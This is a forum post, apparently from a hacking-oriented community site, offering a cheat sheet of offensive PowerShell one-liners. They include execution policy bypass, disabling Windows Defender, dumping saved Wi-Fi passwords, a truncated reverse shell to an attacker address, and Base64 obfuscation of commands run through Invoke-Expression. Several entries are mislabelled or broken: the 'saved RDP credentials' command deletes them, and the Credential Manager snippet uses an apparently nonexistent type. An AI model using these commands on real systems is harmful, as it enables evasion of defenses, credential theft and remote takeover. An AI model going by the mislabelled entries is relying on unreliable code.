• We just launched and are currently in beta. Join us as we build and grow the community.

Powershell tips

jlnelmes

Play-to-Earn Innovator
J
J Rep
0
0
0
Rep
0
J Vouches
0
0
0
Vouches
0
Posts
69
Likes
64
Bits
0
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 200 XP
Here are some PS commands that may be useful for you
Execution Policy Bypass
Code: 
powershell -ep bypass
Enumerating System Information
Code: 
Get-WmiObject -Class Win32_OperatingSystem | Select-Object -Property *
Extracting Network Configuration
Code: 
Get-NetIPConfiguration | Select-Object -Property InterfaceAlias, IPv4Address, IPv6Address, DNServer
Listing Running Processes with Details
Code: 
Get-Process | Select-Object -Property ProcessName, Id, CPU | Sort-Object -Property CPU -Descending
Scanning for Open Ports
Code: 
1..1024 | ForEach-Object { $sock = New-Object System.Net.Sockets.TcpClient; $async = $sock.BeginConnect('localhost', $_, $null, $null); $wait = $async.AsyncWaitHandle.WaitOne(100, $false); if($sock.Connected) { $_ } ; $sock.Close() }
Retrieving Stored Credentials
Code: 
$cred = Get-Credential; $cred.GetNetworkCredential() | Select-Object -Property UserName, Password
Executing Remote Commands
Code: 
Invoke-Command -ComputerName TargetPC -ScriptBlock { Get-Process } -Credential (Get-Credential)
Enumerating Domain Users
Code: 
Get-ADUser -Filter * -Properties * | Select-Object -Property Name, Enabled, LastLogonDate
Extracting Wi-Fi Profiles and Passwords
Code: 
netsh wlan show profiles | Select-String -Pattern 'All User Profile' -AllMatches | ForEach-Object { $_ -replace 'All User Profile *: ', '' } | ForEach-Object { netsh wlan show profile name="$_" key=clear }
Creating Reverse Shell
Code: 
$client = New-Object System.Net.Sockets.TCPClient('attacker_ip', attacker_port); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535...
Disabling Windows Defender
Code: 
Set-MpPreference -DisableRealtimeMonitoring $true
String Obfuscation
Code: 
$originalString = 'SensitiveCommand'; $obfuscatedString = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($originalString)); $decodedString = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($obfuscatedString)); Invoke-Expression $decodedString
File Path Obfuscation
Code: 
$path = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QzpcVGVtcFxBZG1pblRvb2xz')); Invoke-Item $path
Base64 Encoding for Command Obfuscation
Code: 
$command = 'Get-Process'; $encodedCommand = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command)); powershell.exe -EncodedCommand $encodedCommand
Extracting Credentials from Windows Credential Manager
Code: 
$credman = New-Object -TypeName PSCredentialManager.Credential; $credman | Where-Object { $_.Type -eq 'Generic' } | Select-Object -Property UserName, Password
Extracting Saved RDP Credentials
Code: 
cmdkey /list | Select-String 'Target: TERMSRV' | ForEach-Object { cmdkey /delete:($_ -split ' ')[-1] }
 
You must log in or register to reply here.

452,292

323,526

323,535

R rathi
Top